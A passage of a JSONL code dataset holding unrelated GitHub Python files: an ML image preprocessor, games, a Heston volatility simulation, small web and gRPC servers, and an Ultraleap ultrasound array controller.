Allowed formats are: {\",\".join(self.accepted_formats)}')\n\n \n \n def pre_process_images(self, files):\n pre_processed_files = []\n\n for file in files:\n # Load RGB image \n img = Image.open(file).convert(\"RGB\")\n\n # Resize image to specified image dimensions\n img = img.resize((224,224),Image.ANTIALIAS)\n\n # Rescale the image\n img = np.array(img)/255\n\n # Convert tensor to 4D\n img = np.expand_dims(img, 0)\n\n pre_processed_files.append(img)\n\n return np.concatenate(pre_processed_files)","repo_name":"MattJKirby/ML-Dog-Facial-Recognition-FYP","sub_path":"recognition-service/recognition_service/imageProcessor.py","file_name":"imageProcessor.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10677403059","text":"def solution(genres, plays):\n answer = []\n genre = {}\n play = {}\n for i in range(len(genres)):\n if genres[i] not in genre: genre[genres[i]] = plays[i]\n else: genre[genres[i]] += plays[i]\n genre = sorted(genre.items(), key = lambda x: -x[1])\n play = [[genres[i], plays[i], i] for i in range(len(plays))]\n play = sorted(play, key = lambda x: -x[1])\n for i in genre:\n count = 0\n for j in play:\n if(j[0] == i[0]):\n count += 1\n if(count > 2): break\n else: answer.append(j[2])\n return answer\n","repo_name":"yeonwoo8528/Algorithm-Study","sub_path":"3회차/베스트앨범.py","file_name":"베스트앨범.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30272621905","text":"import json\nimport sys\n\nimport tensorflow as tf\nimport os\n\nfrom tensorflow.keras import mixed_precision\n\n# configuration\nfrom Utils.enums import User, Environment, Accelerator\n\nuser = User.Arash\nenvironment = Environment.GoogleColab\naccelerator = Accelerator.GPU\n\nbatch_size = 64\nlatent_dim = 100\nepochs = 10\nsupervised_samples_ratio = 0.05\nsave_interval = 17\nsuper_batches = 1\nunsuper_batches = 1\nprefetch_no = tf.data.AUTOTUNE\neager_execution = True\nmodel_summery = False\nresume_training = False\n\n\ndef parse_args():\n # Parsing Arguments\n global user\n global environment\n global accelerator\n global batch_size\n global latent_dim\n global epochs\n global supervised_samples_ratio\n global save_interval\n global super_batches\n global unsuper_batches\n global prefetch_no\n global eager_execution\n global model_summery\n for arg in sys.argv:\n if arg.lower().__contains__(\"user\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower() == \"arash\":\n user = User.Arash\n elif param.lower() == \"kinza\":\n user = User.Kinza\n if arg.lower().__contains__(\"envi\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower() == \"local\":\n environment = Environment.Local\n elif param.lower() == \"colab\":\n environment = Environment.GoogleColab\n elif param.lower() == \"research\":\n environment = Environment.GoogleResearch\n if arg.lower().__contains__(\"accel\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower() == \"gpu\":\n accelerator = Accelerator.GPU\n elif param.lower() == \"tpu\":\n accelerator = Accelerator.TPU\n if arg.lower().__contains__(\"batch\"):\n param = arg[arg.index(\"=\") + 1:]\n batch_size = int(param)\n if arg.lower().__contains__(\"epoch\"):\n param = arg[arg.index(\"=\") + 1:]\n epochs = int(param)\n if arg.lower().__contains__(\"sample_ratio\"):\n param = arg[arg.index(\"=\") + 1:]\n supervised_samples_ratio = float(param)\n if 
arg.lower().__contains__(\"save_interval\"):\n param = arg[arg.index(\"=\") + 1:]\n save_interval = int(param)\n if arg.lower().__contains__(\"super_batches\"):\n param = arg[arg.index(\"=\") + 1:]\n super_batches = int(param)\n if arg.lower().__contains__(\"unsuper_batches\"):\n param = arg[arg.index(\"=\") + 1:]\n unsuper_batches = int(param)\n if arg.lower().__contains__(\"eager\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower().__contains__(\"false\"):\n eager_execution = False\n else:\n eager_execution = True\n if arg.lower().__contains__(\"model_sum\"):\n param = arg[arg.index(\"=\") + 1:]\n if param.lower().__contains__(\"false\"):\n model_summery = False\n else:\n model_summery = True\n\n\ndef configure(enable_xla: bool = True,\n print_device_placement: bool = False,\n enable_eager_execution: bool = True,\n only_cpu: bool = False,\n enable_memory_growth: bool = True,\n enable_mixed_float16: bool = False):\n # Configurations\n #########################################################\n # To enable xla compiler\n if enable_xla:\n os.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\n #########################################################\n # To print out on which device operation is taking place\n if print_device_placement:\n tf.debugging.set_log_device_placement(True)\n #########################################################\n # To disable eager execution and use graph functions\n if not enable_eager_execution:\n tf.compat.v1.disable_eager_execution()\n #########################################################\n # To disable GPUs\n if only_cpu:\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n #########################################################\n # Setting memory growth\n gpus = tf.config.list_physical_devices('GPU')\n if enable_memory_growth and gpus:\n try:\n tf.config.experimental.set_memory_growth(gpus[0], True)\n except \"Invalid Device\":\n # Invalid device or cannot modify virtual devices once initialized.\n pass\n #########################################################\n # Create 2 virtual GPUs with 1GB memory each\n # if gpus:\n # try:\n # tf.config.experimental.set_virtual_device_configuration(\n # gpus[0],\n # [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024),\n # tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024)])\n # logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n # print(len(gpus), \"Physical GPU,\", len(logical_gpus), \"Logical GPUs\")\n # except RuntimeError as e:\n # # Virtual devices must be set before GPUs have been initialized\n # print(e)\n #########################################################\n # Using mixed_precision to activate Tensor Cores\n if enable_mixed_float16:\n mixed_precision.set_global_policy('mixed_float16')\n #########################################################\n # Configurations\n","repo_name":"kindle-coder/UM-PDD","sub_path":"configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11142261958","text":"from typing import List\nfrom wordle import Wordle, WordleLengthException\n\n\nclass bcolors:\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n\n\ndef print_guess_check(guess: str, check: List[int]) -> None:\n \"\"\"\n Pretty prints the guess of the user depending on its accuracy\n :param guess:\n :param check:\n \"\"\"\n print(f''.join([f'{bcolors.OKGREEN if check[i] == 2 else 
bcolors.WARNING if check[i] == 1 else bcolors.FAIL} {g} {bcolors.ENDC}' for i, g in enumerate(guess.upper())]))\n\n\ndef game_loop(wordle: Wordle) -> None:\n \"\"\"\n Game loop. Asks the user for a guess until he does it right or it has no more tries left.\n \"\"\"\n # print(wordle)\n\n tries_left = 5\n while tries_left > 0:\n try:\n guess = input(f'What is your guess? - (Lives: {tries_left}): ')\n if len(guess) != 5:\n raise WordleLengthException('Length should be 5 characters')\n\n check = wordle.check(guess)\n print_guess_check(guess, check)\n\n if sum(check) == 10:\n print('CORRECT!')\n break\n\n tries_left -= 1\n\n except Exception as e:\n print('ERROR:', e)\n\n if tries_left == 0:\n print('Too bad, I am sorry...')\n print(f'The solution was {wordle}')\n\n\nif __name__ == '__main__':\n choice = True\n wordle = Wordle()\n while choice:\n wordle.generate_wordle()\n game_loop(wordle)\n choice = 1 if input('Do you want another round? (y/N) ') == 'y' else 0\n\n print('Thanks for playing!')\n","repo_name":"jorgegomzar/PyWordle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74189221710","text":"from random import choice\nimport string\n\nriddle = ['python', 'java', 'kotlin', 'javascript']\n\nprint(\"H A N G M A N\")\nanswer = choice(riddle)\nhint = \"-\" * (len(answer))\nletter_set = set(answer)\ntries = 8\nuser_guesses = []\n\n\ndef ft_check_input(char):\n user_guesses.append(char)\n if len(char) != 1:\n return \"You should print a single letter\"\n elif char not in string.ascii_lowercase:\n return \"It is not an ASCII lowercase letter\"\n elif user_guesses.count(char) > 1:\n return \"You already typed this letter\"\n return 0\n\n\ndef ft_game():\n global answer, hint, tries\n while tries > 0:\n print(f'\\n{hint}')\n if \"-\" not in hint:\n print(\"\"\"You guessed the word!\nYou survived!\"\"\")\n break\n char = input('Input a letter: ')\n if ft_check_input(char) != 0:\n print(ft_check_input(char))\n continue\n if char in letter_set:\n counter = 0\n for n in answer:\n if char == n:\n hint = list(hint)\n hint[counter] = n\n hint = \"\".join(hint)\n counter += 1\n else:\n print(\"No such letter in the word\")\n tries -= 1\n else:\n print(\"You are hanged!\")\n\n\ndef ft_menu():\n while True:\n menu = input('Type \"play\" to play the game, \"exit\" to quit: ')\n if menu == \"play\":\n ft_game()\n elif menu == \"exit\":\n break\n else:\n continue\n\n\nft_menu()\n","repo_name":"Lucimore/Hangman","sub_path":"Hangman/task/hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"2941067966","text":"import numpy as np\nimport numpy.random as npr\nfrom pylab import plt\nimport scipy.stats as scs\n\n'''\nBSM model with the Euler scheme discretisation.\nShort rate and the volatility can vary in time. \nHere we apply the square root diffusion to the volatility \n(Heston stochastic volatility model). 
\nWith the Cholesky matrix we model\nthe correlation between the market and v(t).\n'''\n\nS0 = 100.\nr = 0.05\nv0 = 0.1 # Initial value of the volatility\nkappa = 3.0 # Mean reversion factor (how fast it goes to the asymptotic value)\ntheta = 0.25 # Long-term mean value (asymptotic value)\nsigma = 0.1\nrho = -0.6 # Fixed correlation between the two Brownian motions.\nT = 1.0\nnti = 100 # number of time intervals\nn_p = 100000 # Number of paths\ndt = T/nti\n\ncorr_mat = np.zeros((2, 2))\ncorr_mat[0, :] = [1.0, rho]\ncorr_mat[1, :] = [rho, 1.0]\ncho_mat = np.linalg.cholesky(corr_mat) # Cholesky decomposition\nprint(cho_mat) # resulting matrix\nran_num = npr.standard_normal((2, nti + 1, n_p)) # three-dimensional random number data set.\nv = np.zeros_like(ran_num[0])\nvh = np.zeros_like(v)\nv[0] = v0\nvh[0] = v0\nfor t in range(1, nti + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n vh[t] = (vh[t - 1] +\n kappa * (theta - np.maximum(vh[t - 1], 0)) * dt +\n sigma * np.sqrt(np.maximum(vh[t - 1], 0)) *\n np.sqrt(dt) * ran[1])\n\nv = np.maximum(vh, 0)\n\nS = np.zeros_like(ran_num[0])\nS[0] = S0\nfor t in range(1, nti + 1):\n ran = np.dot(cho_mat, ran_num[:, t, :])\n S[t] = S[t - 1] * np.exp((r - 0.5 * v[t]) * dt + np.sqrt(v[t]) * ran[0] * np.sqrt(dt))\n\nstat = scs.describe(S[-1])\n#print(\"mean \", stat[2], np.mean(S[-1]))\n#print(\"std \", stat[3]**0.5, np.std((S[-1])))\n\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 8))\nax1.hist(S[-1], bins=50, weights=np.ones(len(S[-1])) / len(S[-1]))\nax1.set_xlabel('index level')\nax1.set_ylabel('frequency')\nax2.hist(v[-1], bins=50, weights=np.ones(len(v[-1])) / len(v[-1]))\nax2.set_xlabel('volatility')\nplt.savefig('Fig/b-hists')\n\nfig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 8))\nax1.plot(S[:, :10], lw=1.5)\nax1.set_ylabel('index level')\nax2.plot(v[:, :10], lw=1.5)\nax2.set_xlabel('time intervals (max = 1 year)')\nax2.set_ylabel('volatility')\nplt.savefig('Fig/b-paths')\nplt.show()\n","repo_name":"marcofpsantoni/SFinance","sub_path":"BSM&beyond/b-BSM+Volatility(t).py","file_name":"b-BSM+Volatility(t).py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29346732129","text":"\nfrom concurrent import futures\nimport logging\nimport mensaje_pb2_grpc as mensajepb2\nfrom mensaje_pb2_grpc import ItemService\nfrom mensaje_pb2 import Response\nimport grpc\nimport psycopg2\nimport sys\n\n\nconn = psycopg2.connect(\n host=\"localhost\",\n database=\"tiendita\",\n user=\"postgres\",\n password=\"marihuana\")\ncur = conn.cursor()\n\n\nclass ServicioItems(ItemService):\n def GetItem(self,request,context):\n introredis = str(sys.argv[1])\n cur.execute('SELECT * FROM ITEMS WHERE Name LIKE %s OR Price LIKE %s OR Category LIKE %s OR Count LIKE %s')(introredis)\n return Response()\n \n\n\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n # mensaje_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)\n server.add_insecure_port('[::]:50051')\n server.start()\n server.wait_for_termination()\n print(\"Servidor Arriba\")\n\nif __name__ == '__main__':\n serve()\n\n\n\n\n\n","repo_name":"lagossully/Sistemas_Distribuidos","sub_path":"Tarea_1/App/Tarea1/API/DB_server.py","file_name":"DB_server.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42426224825","text":"from util import *\n\n\n@apply\ndef apply(given, 
scale, div=False):\n lhs, rhs = given.of(LessEqual)\n if div:\n le = lhs / scale <= rhs / scale\n else:\n le = lhs * scale <= rhs * scale\n return le, scale > 0\n\n\n@prove\ndef prove(Eq):\n from axiom import algebra\n\n x, y, z = Symbol(real=True, given=True)\n Eq << apply(LessEqual(x, y), z, div=True)\n\n Eq << algebra.gt_zero.le.imply.le.mul.apply(Eq[2], Eq[1])\n\n\nif __name__ == '__main__':\n run()\n# created on 2019-08-19\n","repo_name":"cosmosZhou/sympy","sub_path":"axiom/algebra/le/given/et/scale/positive.py","file_name":"positive.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"17586245649","text":"from flask import Blueprint, jsonify, session, request\nfrom app.models import db, Transfer\nfrom ..forms import TransferForm\nfrom datetime import datetime\nfrom flask_login import current_user\nfrom ..utils import to_dict_list, form_errors_obj_list, print_data\n\ntransfer_routes = Blueprint('transfer', __name__)\n\n\n@transfer_routes.route(\"/\")\ndef get_user_transfers():\n '''\n get a list of ALL current users transfers\n '''\n\n current_user_id = current_user.to_dict()[\"id\"]\n\n transfer_data = Transfer.query.filter(Transfer.user_id == current_user_id)\n\n\n if transfer_data:\n transfer_list = to_dict_list(transfer_data)\n return transfer_list\n else:\n return {\"error\": \"No transfers made for this user\"}\n\n# ------------------------------------------------------------------------------\n@transfer_routes.route(\"/\", methods=[\"POST\"])\ndef create_transfer():\n '''\n create a transfer for the current user\n '''\n\n user = current_user.to_dict()\n res = request.get_json()\n\n form = TransferForm()\n form[\"csrf_token\"].data = request.cookies[\"csrf_token\"]\n\n if form.validate_on_submit():\n new_transfer = Transfer(\n portfolio_id=user[\"portfolio\"][\"id\"],\n bank_account_id=res[\"bank_account_id\"],\n user_id=user[\"id\"],\n amount=res[\"amount\"],\n type=res[\"type\"],\n date=datetime.now()\n )\n db.session.add(new_transfer)\n db.session.commit()\n return new_transfer.to_dict()\n\n return {'errors': form_errors_obj_list(form.errors)}, 401\n","repo_name":"Jblancs/robinhood-clone","sub_path":"app/api/transfer_routes.py","file_name":"transfer_routes.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"342016795","text":"from http.server import BaseHTTPRequestHandler, HTTPServer \nimport time \nimport json\nfrom socketserver import ThreadingMixIn\nimport threading\n\nhostName = \"0.0.0.0\"\nserverPort = 80\n\nclass Handler(BaseHTTPRequestHandler):\n \n def do_GET(self):\n \n if self.path == \"/\":\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n content = open(\"index.html\", \"r\").read() \n self.wfile.write(bytes(content, \"utf-8\"))\n else:\n self.send_response(\"404\")\n \n return\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n \"\"\"Handle requests in a separate thread\"\"\"\n \nif __name__ == '__main__':\n server = ThreadedHTTPServer((hostName, serverPort), Handler)\n print(time.asctime(), \"Server Starts - %s:%s\" % (hostName, serverPort))\n \ntry:\n server.serve_forever()\nexcept KeyboardInterrupt:\n pass\n \nserver.server_close()\nprint(time.asctime(), \"Server Stops - %s:%s\" % (hostName, serverPort))\n 
\n\n","repo_name":"silviafpp/python_webserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19485167926","text":"# coding=utf-8\n#Sober算子\n\n# 图像中的边缘区域,像素值会发生“跳跃”,对这些像素求导,在其一阶导数在边缘位置为极值,这就是Sobel算子使用的原理——极值处就是边缘。\n\n# Sobel算子依然是一种过滤器,只是其是带有方向的。在OpenCV-Python中,使用Sobel的算子的函数原型如下:\n# dst = cv2.Sobel(src, ddepth, dx, dy[, dst[, ksize[, scale[, delta[, borderType]]]]])\n# 函数返回其处理结果。\n#前四个是必须的参数:\n#第一个参数是需要处理的图像;\n# 第二个参数是图像的深度,-1表示采用的是与原图像相同的深度。目标图像的深度必须大于等于原图像的深度;\n# dx和dy表示的是求导的阶数,0表示这个方向上没有求导,一般为0、1、2。\n# 其后是可选的参数:\n# dst不用解释了;\n# ksize是Sobel算子的大小,必须为1、3、5、7。\n# scale是缩放导数的比例常数,默认情况下没有伸缩系数;\n# delta是一个可选的增量,将会加到最终的dst中,同样,默认情况下没有额外的值加到dst中;\n# borderType是判断图像边界的模式。这个参数默认值为cv2.BORDER_DEFAULT。\n\n\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('D:/zsb.jpg', 0)\norigin = cv2.imread('D:/zsb.jpg')\nx = cv2.Sobel(img, cv2.CV_16S, 1, 0)\ny = cv2.Sobel(img, cv2.CV_16S, 0, 1)\n\nabsX = cv2.convertScaleAbs(x) # 转回uint8\nabsY = cv2.convertScaleAbs(y)\n\ndst = cv2.addWeighted(absX, 0.5, absY, 0.5, 0)\n\n\nprint(dst.shape)\n\ncv2.imshow('absX', absX)\ncv2.imshow('absY', absY)\n\ncv2.imshow('Result', dst)\n\ncv2.imshow('Origin', origin)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n# 解释:\n# 在Sobel函数的第二个参数这里使用了cv2.CV_16S。因为OpenCV文档中对Sobel算子的介绍中有这么一句:“in the case of 8-bit input images it will result in truncated derivatives”。即Sobel函数求完导数后会有负值,还有会大于255的值。而原图像是uint8,即8位无符号数,所以Sobel建立的图像位数不够,会有截断。因此要使用16位有符号的数据类型,即cv2.CV_16S。\n# 在经过处理后,别忘了用convertScaleAbs()函数将其转回原来的uint8形式。否则将无法显示图像,而只是一副灰色的窗口。\n# convertScaleAbs()的原型为:\n# dst = cv2.convertScaleAbs(src[, dst[, alpha[, beta]]])\n# 其中可选参数alpha是伸缩系数,beta是加到结果上的一个值。结果返回uint8类型的图片。\n\n# 由于Sobel算子是在两个方向计算的,最后还需要用cv2.addWeighted(...)函数将其组合起来。其函数原型为:\n# dst = cv2.addWeighted(src1, alpha, src2, beta, gamma[, dst[, dtype]])\n# 其中alpha是第一幅图片中元素的权重,beta是第二个的权重,gamma是加到最后结果上的一个值。","repo_name":"ihona/Python","sub_path":"OpenCV/object2.py","file_name":"object2.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"23904560691","text":"import numpy as np\nimport socket\nimport subprocess\nimport os.path\nfrom ..arrays import NormalTransducerArray\n\n\nclass UltraleapArray:\n \"\"\"Mixin class for Ultraleap arrays.\n\n This implements a very simple control of the Ultraleap hardware from pytohn,\n by sending data via TCP to a c++ process running in the background.\n\n Note\n ----\n This class is not implemented by Ultraleap, and no guarantee is given that\n the implementation works or gives the correct output.\n\n **Use at your own risk!**\n\n \"\"\"\n def connect(self, *args, **kwargs):\n \"\"\"Connect to a physical array.\n\n See `UltraleapArray.TCPconnection` for more details.\n\n \"\"\"\n self.connection = UltraleapArray.TCPconnection(*args, **kwargs)\n\n @property\n def connection(self):\n try:\n return self._connection\n except AttributeError:\n self.connect()\n return self._connection\n\n @connection.setter\n def connection(self, value):\n self._connection = value\n\n class TCPconnection:\n \"\"\"Communicate with a Ultraleap array via TCP.\n\n Starts a c++ process in the background which connects to a Ultraleap array.\n Communicates with the c++ program using TCP messages.\n The only mode implemented for the array is a cyclical transition of stored states.\n A number of states is loaded, either from file or sent via 
TCP. The states are\n cycled through in a configurable rate or manually. At the end of the list of states\n the cycle starts over from the start.\n This makes it relatively easy to create closed paths by ensuring that the last state\n and the first state is designed to levitate at (almost) the same position.\n\n The required binary file `array_control` is compiled from the included c++ source files if not present.\n Inspect the makefile in unix systems, or make.bat on windows to see how the files are compiled.\n If the compilation fails a `RuntimeError` is raised. If the binary already exists it will be used.\n\n Parameters\n ----------\n ip : string, default '127.0.0.1'\n The IP address to use for the local TCP-connection.\n port : int, default 0\n The port to use for the TCP connection.\n use_array : bool, default True\n Set to false to not try to connect to an array, just run the c++\n executable in the background. Mostly for debugging.\n verbose : int, default 0\n Control the verbosity level of the c++ program.\n 0 will not print anything, higher values will give more information.\n normalize : bool, default True\n Toggles normalization of the state amplitudes.\n\n \"\"\"\n\n _executable = 'array_control'\n\n def __init__(self, ip='127.0.0.1', port=0, use_array=True, verbose=0, normalize=True):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((ip, port))\n self.ip, self.port = self.sock.getsockname()\n\n args = []\n if verbose:\n args.append('--verbose')\n args.append(str(verbose))\n if not use_array:\n args.append('-noarray')\n\n self._start_subprocess(*args)\n self.sock.listen()\n self.conn, self._addr = self.sock.accept()\n self.normalize = normalize\n\n def _start_subprocess(self, *extra_args):\n directory = os.path.dirname(__file__)\n name = os.path.join(directory, self.executable)\n if not os.path.exists(name):\n self._compile()\n args = [name, '--ip', self.ip, str(self.port)]\n args.extend(extra_args)\n self._cpp_process = subprocess.Popen(args=args)\n\n @staticmethod\n def _compile():\n directory = os.path.dirname(__file__)\n if os.name == 'nt':\n result = subprocess.run(os.path.join(directory, 'make.bat'), cwd=directory)\n if result.returncode != 0:\n raise RuntimeError('array_control binary non-existent and c++ toolchain cannot compile binary!')\n else:\n result = subprocess.run('make', cwd=directory)\n if result.returncode != 0:\n raise RuntimeError('array_control binary non-existent and c++ toolchain cannot compile binary!')\n\n def _send(self, *messages):\n for message in messages:\n if type(message) is not bytes:\n try:\n message = bytes(message)\n except TypeError:\n message = bytes(message, 'ASCII')\n if message[-1] is not 0:\n message += b'\\0' # Properly terminate strings.\n msg_len = np.uint32(len(message))\n self.conn.sendall(msg_len)\n self.conn.sendall(message)\n\n def _recv(self, count=1):\n if count == 1:\n msg_len = np.squeeze(np.frombuffer(self.conn.recv(4), dtype=np.uint32))\n msg = b''\n while len(msg) < msg_len:\n msg += self.conn.recv(msg_len)\n return msg\n else:\n return [self._recv() for _ in range(count)]\n\n def close(self):\n \"\"\"Close the collection to the array and terminate the c++ process.\"\"\"\n if self._cpp_process.poll() is None:\n self._send('quit')\n self._cpp_process.wait()\n self.conn.close()\n self.sock.close()\n\n def __del__(self):\n self.close()\n\n @property\n def executable(self): # noqa : D401\n \"\"\"The name of the binary to use.\"\"\"\n if os.name == 'nt':\n return self._executable + '.exe'\n 
else:\n return self._executable\n\n @executable.setter\n def executable(self, val):\n self._executable = val.rstrip('.exe')\n\n @property\n def emit(self):\n \"\"\"Control if the array is emitting or not.\"\"\"\n self._send('emit')\n return self._recv().decode()\n\n @emit.setter\n def emit(self, val):\n if val is True or val == 'on':\n self._send('emit on')\n elif val is False or val == 'off':\n self._send('emit off')\n else:\n raise ValueError('Unknown emit state: ' + val)\n\n @property\n def amplitude(self):\n \"\"\"Control the overall amplitude scaling of the array.\"\"\"\n self._send('ampl')\n return np.array(self._recv()).astype(float)\n\n @amplitude.setter\n def amplitude(self, val):\n if val < 0 or val > 1:\n raise ValueError('Amplitude must not be <0 or >1')\n self._send('amplitude ' + str(val))\n\n @property\n def rate(self):\n \"\"\"Control the state transition rate of the array, in Hz.\"\"\"\n self._send('rate')\n return np.array(self._recv()).astype(float)\n\n @rate.setter\n def rate(self, val):\n self._send('rate ' + str(val))\n\n def next(self, count=1):\n \"\"\"Go to the next state.\n\n Parameters\n ----------\n count : int\n How many states to move, default 1.\n\n \"\"\"\n self._send('next ' + str(count))\n\n def prev(self, count=1):\n \"\"\"Go to the previous state.\n\n Parameters\n ----------\n count : int\n How many states to move, default 1.\n\n \"\"\"\n self._send('prev ' + str(count))\n\n @property\n def num_transducers(self):\n \"\"\"Number of transducers in the array.\"\"\"\n self._send('transducer count')\n return np.array(self._recv()).astype(int)\n\n @property\n def positions(self):\n \"\"\"Positions of the transducer elements.\"\"\"\n num_transducers = self.num_transducers\n self._send('transducer positions')\n raw = self._recv(num_transducers)\n return np.array([np.array(x.decode().strip('()').split(',')).astype(float) for x in raw])\n\n @property\n def normals(self):\n \"\"\"Normals of the transducer elements.\"\"\"\n num_transducers = self.num_transducers\n self._send('transducer normals')\n raw = self._recv(num_transducers)\n return np.array([np.array(x.decode().strip('()').split(',')).astype(float) for x in raw])\n\n @property\n def index(self):\n \"\"\"Current state index.\"\"\"\n self._send('index')\n return np.array(self._recv()).astype(int)\n\n @index.setter\n def index(self, val):\n self._send('index ' + str(val))\n\n @property\n def states(self):\n \"\"\"Control the stored states.\n\n Set this property to send new states to the array.\n Get this property to check what states are stored for the array.\n The states have the shape `(M, N)`, where `M` is the number of states,\n and `N` is the number of transducers in the array.\n \"\"\"\n num_transducers = self.num_transducers\n self._send('printstates')\n num_states_raw = self._recv()\n num_states = np.array(num_states_raw.decode().strip(\"Displaying all states.\")).astype(int)\n states = []\n for _ in range(num_states):\n header = self._recv()\n state_raw = self._recv(num_transducers)\n states.append([complex(*np.array(trans_raw.decode().rsplit(':')[1].strip(' () ').split(',')).astype(float)) for trans_raw in state_raw])\n return np.array(states).conj()\n\n @states.setter\n def states(self, states):\n states = np.atleast_2d(states)\n if self.normalize:\n normalization = np.max(np.abs(states))\n else:\n normalization = 1\n num_states = states.size / self.num_transducers\n if not num_states == int(num_states):\n raise ValueError('Cannot send uncomplete states!')\n self._send('states ' + str(num_states))\n 
for state in states:\n msg = (state / normalization).conj().astype(np.complex64).tobytes()\n self._send(msg)\n\n def read_file(self, filename):\n \"\"\"Read a file with states.\n\n Specify a file with states to read in the c++ process.\n This is not to be confused with `~levitate.hardware.data_from_c++`, which\n reads a file to a numpy.array.\n\n Parameters\n ----------\n filename : str\n The file to read.\n\n \"\"\"\n self._send('file ' + filename)\n\n\nclass DragonflyArray(NormalTransducerArray, UltraleapArray):\n \"\"\"Rectangular array with Ultraleap Dragonfly U5 layout.\n\n This is a 16x16 element array where the order of the transducer elements\n are the same as the iteration order in the Ultraleap SDK. Otherwise\n behaves exactly like a `RectangularArray`.\n \"\"\"\n\n spread = 10.47e-3\n grid_indices = np.array([\n [95, 94, 93, 92, 111, 110, 109, 108, 159, 158, 157, 156, 175, 174, 173, 172],\n [91, 90, 89, 88, 107, 106, 105, 104, 155, 154, 153, 152, 171, 170, 169, 168],\n [87, 86, 85, 84, 103, 102, 101, 100, 151, 150, 149, 148, 167, 166, 165, 164],\n [83, 82, 81, 80, 99, 98, 97, 96, 147, 146, 145, 144, 163, 162, 161, 160],\n [79, 78, 77, 76, 127, 126, 125, 124, 143, 142, 141, 140, 191, 190, 189, 188],\n [75, 74, 73, 72, 123, 122, 121, 120, 139, 138, 137, 136, 187, 186, 185, 184],\n [71, 70, 69, 68, 119, 118, 117, 116, 135, 134, 133, 132, 183, 182, 181, 180],\n [67, 66, 65, 64, 115, 114, 113, 112, 131, 130, 129, 128, 179, 178, 177, 176],\n [49, 48, 51, 50, 1, 0, 3, 2, 241, 240, 243, 242, 193, 192, 195, 194],\n [53, 52, 55, 54, 5, 4, 7, 6, 245, 244, 247, 246, 197, 196, 199, 198],\n [57, 56, 59, 58, 9, 8, 11, 10, 249, 248, 251, 250, 201, 200, 203, 202],\n [61, 60, 63, 62, 13, 12, 15, 14, 253, 252, 255, 254, 205, 204, 207, 206],\n [33, 32, 35, 34, 17, 16, 19, 18, 225, 224, 227, 226, 209, 208, 211, 210],\n [37, 36, 39, 38, 21, 20, 23, 22, 229, 228, 231, 230, 213, 212, 215, 214],\n [41, 40, 43, 42, 25, 24, 27, 26, 233, 232, 235, 234, 217, 216, 219, 218],\n [45, 44, 47, 46, 29, 28, 31, 30, 237, 236, 239, 238, 221, 220, 223, 222]\n ])\n\n def __init__(self, **kwargs):\n ny, nx = self.grid_indices.shape\n positions = np.zeros((3, nx * ny), float)\n positions[:, self.grid_indices] = np.stack(\n np.meshgrid(np.arange(16) - 7.5, 7.5 - np.arange(16), 0, indexing='xy'),\n axis=0).reshape((3, ny, nx)) * self.spread\n super().__init__(positions=positions, normals=[0, 0, 1], transducer_size=10e-3, **kwargs)\n","repo_name":"AppliedAcousticsChalmers/levitate","sub_path":"levitate/hardware/_ultraleap.py","file_name":"_ultraleap.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"83"} +{"seq_id":"11010145383","text":"from django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nfrom flask import json\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom Django_MVVM.dao_emp import DaoEmp\r\n\r\ndef go(request):\r\n return render(request, 'index.html')\r\n\r\n@csrf_exempt\r\ndef ajax(request):\r\n #menu = request.GET.get(\"menu\", '')\r\n menu = json.loads(request.body)\r\n context = {\r\n 'result': menu['menu']\r\n }\r\n return 